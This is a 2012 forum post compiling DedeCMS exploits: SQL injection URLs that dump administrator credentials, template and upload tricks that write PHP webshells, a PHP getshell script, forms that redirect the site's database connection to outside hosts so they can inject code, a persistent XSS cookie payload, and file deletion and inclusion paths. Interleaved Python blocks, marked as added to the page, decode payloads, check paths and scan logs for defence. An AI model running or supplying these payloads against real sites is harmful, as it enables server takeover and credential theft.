Views: 2881 | Replies: 0

DedeCMS vulnerability roundup

Posted 2012-10-18 10:42:14

DedeCMS 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1


DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php, a one-line shell with password xiao.
DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit". Note that IE8/9 block URL-type XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. Whichever of the URLs below is visited afterwards, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
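For the defender's side of the gotopage item, here is an added Python example (written for this page; it is not from the original post and not DedeCMS code). It decodes a String.fromCharCode payload of the kind used in the URL above so an analyst can read what it does, and contrasts an attribute rendering that reflects the value raw with one that validates it as a site-relative path and HTML-escapes it. The two render functions and the allowed-path rule are assumptions; DedeCMS's real login.php is not reproduced, only the attribute-injection shape the payload relies on.

```python
import html
import re

# The char-code list from the login.php?gotopage= URL in the post, copied so the
# decoder has a real payload to work on.
GOTOPAGE_PAYLOAD_CODES = (
    "80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,"
    "97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,"
    "116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,"
    "59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,"
    "115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,"
    "101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,"
    "99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,"
    "99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,"
    "84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,"
    "116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59"
)


def decode_fromcharcode(js_or_codes):
    """Recover the string that String.fromCharCode(...) builds.

    Accepts a JavaScript fragment containing the call, or the bare
    comma-separated code list; returns None when nothing decodable is found.
    """
    m = re.search(r"String\.fromCharCode\(\s*([\d,\s]+)\)", js_or_codes)
    codes = m.group(1) if m else js_or_codes
    try:
        return "".join(chr(int(n)) for n in codes.split(",") if n.strip())
    except ValueError:
        return None


def render_gotopage_reflected(gotopage):
    """The shape the payload relies on (assumed, not DedeCMS code): the value is
    written into an attribute verbatim, so a leading double quote closes the
    attribute and the rest becomes markup."""
    return '<input type="hidden" name="gotopage" value="' + gotopage + '" />'


# A redirect target inside the site: no scheme, no protocol-relative //host,
# no quotes or angle brackets. Assumed policy for this example.
SAFE_SITE_PATH = re.compile(r"^(?!//)[A-Za-z0-9_./?=&%+-]*$")


def render_gotopage_hardened(gotopage):
    """Validate first, then escape. Validation stops off-site redirects and
    anything that is not a path; escaping stops the remaining characters from
    ever closing the attribute. Applies equally when the value is read from a
    cookie, which is how the payload above persists itself."""
    if not SAFE_SITE_PATH.match(gotopage) or ".." in gotopage:
        gotopage = ""
    return ('<input type="hidden" name="gotopage" value="'
            + html.escape(gotopage, quote=True) + '" />')


if __name__ == "__main__":
    print(decode_fromcharcode(GOTOPAGE_PAYLOAD_CODES))
    print(render_gotopage_hardened('"><script>alert(1)</script><x="'))
```

Decoding the post's payload shows why step 2 of the item works: the script stores the same attribute-breaking string in a `gotopage` cookie with a 365-day expiry, so any later visit to login.php that echoes the cookie re-injects it. The hardened renderer therefore has to treat the cookie value exactly like the query parameter.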
DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)
* d# ~: |0 X6 }$ w
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Replace validate=dcug above with the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must already be known.

DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own DedeCMS database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below and the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
DedeCMS <= V5.6 Final template execution vulnerability
Register a user, go into the member backend, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. Say the image is named:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prefix it with gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造)
</div>

<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DedeCMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../
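The file-deletion item (oldface=/uploads/userup/8/../../../...), the carbuyaction.php inclusion just above (code=../../) and the templet=../uploads/... switch in the template items earlier share one root cause: a request-supplied path is joined onto a base directory and used without checking where it ends up. The Python below is an added example for this page, not DedeCMS code, showing the containment check a fix needs. The directory layout, the include/payment/<code>.php shape and the function names are assumptions.

```python
import posixpath
import re


def resolve_request_path(base_dir, user_path, allowed_subdir="."):
    """Join a request-supplied path onto base_dir the way the vulnerable
    handlers do, normalise it, and return it only if it lies strictly inside
    base_dir/allowed_subdir; otherwise return None.

    Pure string normalisation (posixpath) so the check runs offline. On a real
    filesystem also compare os.path.realpath() of both sides, because a symlink
    inside the allowed directory can still point outside it.
    """
    base = posixpath.normpath(base_dir)
    allowed = posixpath.normpath(posixpath.join(base, allowed_subdir))
    # lstrip('/') stops a leading slash in the request from discarding base_dir
    # in join(); normpath() then collapses every '..' segment.
    target = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    # Strict prefix with a trailing separator: '/site/uploads/userup2' must not
    # pass as being under '/site/uploads/userup', and the directory itself is
    # never a valid file target.
    if target.startswith(allowed + "/"):
        return target
    return None


def resolve_payment_module(base_dir, code):
    """The include-shaped variant (assumed layout: include/payment/<code>.php).
    A module name is an identifier, so allow-list that and let the containment
    check catch anything a future change might let through."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", code):
        return None
    return resolve_request_path(base_dir, f"include/payment/{code}.php", "include/payment")


if __name__ == "__main__":
    site = "/var/www/site"
    for candidate in ("/uploads/userup/8/face.gif",
                      "/uploads/userup/8/../../../member/templets/images/m_logo.gif"):
        print(candidate, "->", resolve_request_path(site, candidate, "uploads/userup"))
    print(resolve_request_path(site + "/templets", "../uploads/userup/2/12OMX04-15A.jpg"))
    print(resolve_payment_module(site, "../../"), resolve_payment_module(site, "demo"))
```

Note that the templet case is rejected even though the file exists and the user legitimately owns it: the check is about which directory may be used as a template source, not about whether the path is readable, which is what lets an uploaded image be parsed as a template in the first place.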
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, i.e. a 20-character MD5 value; to reduce it further, drop 3 characters from the front and 1 from the end to get the 16-character MD5.
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS (织梦) select_soft_post.php uninitialised page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
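The items that post cfg_* fields or ...[GLOBALS][cfg_*] fields (mytag_js.php with _COOKIE[GLOBALS], login.php with _POST[GLOBALS], and the select_soft_post.php form just above, which even says it needs register_globals) all rest on the same thing: request variables being registered into the global scope, where they overwrite configuration. The Python below is an added example written for this page, not DedeCMS code; it emulates that registration on a parsed query string and shows a hardened version that refuses reserved names, which is the denylist approach later DedeCMS releases took. BASE_CONFIG, RESERVED_PREFIXES and the function names are assumptions; the sounder design is never to auto-register request variables at all and read each one explicitly.

```python
import re
from urllib.parse import parse_qsl

# Constructed baseline: what the cfg_* globals hold before a request is handled.
BASE_CONFIG = {
    "cfg_dbhost": "localhost",
    "cfg_dbuser": "app",
    "cfg_dbpwd": "constructed-secret",
    "cfg_dbname": "dede",
    "cfg_dbprefix": "dede_",
    "cfg_basedir": "/var/www/site",
}

# Names a request must never be allowed to set (assumed denylist for this
# example: configuration variables and every PHP superglobal).
RESERVED_PREFIXES = ("cfg_", "globals", "_get", "_post", "_cookie", "_request",
                     "_server", "_session", "_files", "_env")


def parse_php_query(query):
    """Build the nested arrays PHP derives from a query string:
    a[b][c]=1 -> {'a': {'b': {'c': '1'}}}."""
    tree = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        parts = [p for p in re.split(r"\[|\]", key) if p]
        node = tree
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return tree


def _leaves(tree, path=()):
    """Yield (path_tuple, value) for every scalar in a nested dict."""
    for key, value in tree.items():
        if isinstance(value, dict):
            yield from _leaves(value, path + (key,))
        else:
            yield path + (key,), value


def register_request_vulnerable(config, request_tree):
    """Emulates the register_globals-style loop the post exploits: ${$_k} = $_v
    for every request key. In PHP, assigning through the name GLOBALS writes
    into the global symbol table, so any ...[GLOBALS][cfg_x] entry, at any
    depth, ends up as $cfg_x. Emulation of the net effect, not DedeCMS's code."""
    scope = dict(config)
    scope.update(request_tree)
    for path, value in _leaves(request_tree):
        if "GLOBALS" in path[:-1]:
            scope[path[-1]] = value
    return scope


def register_request_hardened(config, request_tree):
    """Same registration, but a top-level request key whose path touches a
    reserved name anywhere is refused outright. Returns (scope, rejected)."""
    scope = dict(config)
    rejected = []
    for key, value in request_tree.items():
        paths = [p for p, _ in _leaves({key: value})]
        if any(seg.lower().startswith(RESERVED_PREFIXES) for p in paths for seg in p):
            rejected.extend(p[0] + "".join(f"[{s}]" for s in p[1:]) for p in paths)
            continue
        scope[key] = value
    return scope, rejected


if __name__ == "__main__":
    body = ("doaction=x&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=10.9.8.7"
            "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&nocache=true")
    tree = parse_php_query(body)
    print("vulnerable:", register_request_vulnerable(BASE_CONFIG, tree)["cfg_dbhost"])
    scope, rejected = register_request_hardened(BASE_CONFIG, tree)
    print("hardened:", scope["cfg_dbhost"], "rejected:", rejected)
```

The same two functions cover the select_soft_post.php form above, where the keys are plain cfg_basedir and cfg_imgtype rather than nested under GLOBALS: the vulnerable registration takes them as-is, the hardened one rejects them by prefix.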
DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS writing database error messages into a PHP file whose header performs no check.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the address in the form's action is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
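To put the catalogue above to defensive use, here is an added Python example (written for this page; not from the post and not DedeCMS code) that parses web-server access-log lines and flags request targets matching the shapes listed: error-based and UNION injection, a raw sql= parameter to advancedsearch.php, GLOBALS/cfg_ overrides, the gotopage XSS, ../ in the oldface, code and templet parameters, and PHP code in parameters. The rule names, the sample log lines (constructed) and the site paths in them are assumptions. Exploits sent in a POST body (mytag_js.php, select_soft_post.php, the article_edit.php template switch) do not appear in a standard access log; those need request-body logging or a WAF in front of the application.

```python
import re
from urllib.parse import unquote_plus

# Signature rules for the request shapes catalogued in the post. Each entry is
# (name, regex applied to the URL-decoded request target, optional path suffix
# the rule is limited to). Written for this example; not from any product.
RULES = [
    ("sqli-error-based",   r"\b(updatexml|extractvalue)\s*\(",       None),
    ("sqli-union",         r"\bunion\s+(all\s+)?select\b",           None),
    ("advancedsearch-sql", r"[?&]sql=",                              "advancedsearch.php"),
    ("globals-override",   r"globals\]\[cfg_|[?&]cfg_[a-z_]+=",      None),
    ("xss-gotopage",       r"[?&]gotopage=[^&]*<",                   "login.php"),
    ("path-traversal",     r"[?&](oldface|code|templet)=[^&]*\.\./", None),
    ("php-in-param",       r"<\?php|\*/\s*eval\s*\(",                None),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE), suffix) for name, pattern, suffix in RULES]

# Common/combined log format: the request line sits in the first quoted field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return the sorted rule names that fire for one request target (path + query).
    The target is URL-decoded once first, so %28 and %20 cannot hide a signature."""
    decoded = unquote_plus(target)
    path = decoded.split("?", 1)[0].lower()
    hits = []
    for name, regex, suffix in COMPILED:
        if suffix and not path.endswith(suffix):
            continue
        if regex.search(decoded):
            hits.append(name)
    return sorted(hits)


def scan_log(text):
    """Map 1-based line numbers of suspicious entries to their rule names.
    Lines that do not parse as access-log entries are skipped."""
    findings = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            findings[lineno] = hits
    return findings


# Constructed sample log: one benign request, then one request per item shape.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2012:10:40:01 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 8123
10.0.0.5 - - [18/Oct/2012:10:40:09 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,pwd,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1 HTTP/1.1" 500 611
10.0.0.5 - - [18/Oct/2012:10:40:15 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2210
10.0.0.5 - - [18/Oct/2012:10:40:22 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 4310
10.0.0.5 - - [18/Oct/2012:10:40:30 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=10.9.8.7 HTTP/1.1" 302 0
10.0.0.5 - - [18/Oct/2012:10:40:41 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 90
10.0.0.5 - - [18/Oct/2012:10:40:47 +0800] "GET /plus/carbuyaction.php?code=../../ HTTP/1.1" 200 0
10.0.0.5 - - [18/Oct/2012:10:40:55 +0800] "GET /plus/digg_frame.php?mid=*/eval($_POST[x]);var_dump(3);?%3E HTTP/1.1" 200 300
10.0.0.5 - - [18/Oct/2012:10:41:02 +0800] "GET /plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 1500
"""


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(hits)}")
```

These rules are for triage, not blocking: a hit on advancedsearch-sql or globals-override on a site that has not removed those endpoints is worth treating as a likely compromise and checking data/cache, plus/ and the upload directories for newly written .php files, which is where every getshell item above drops its payload.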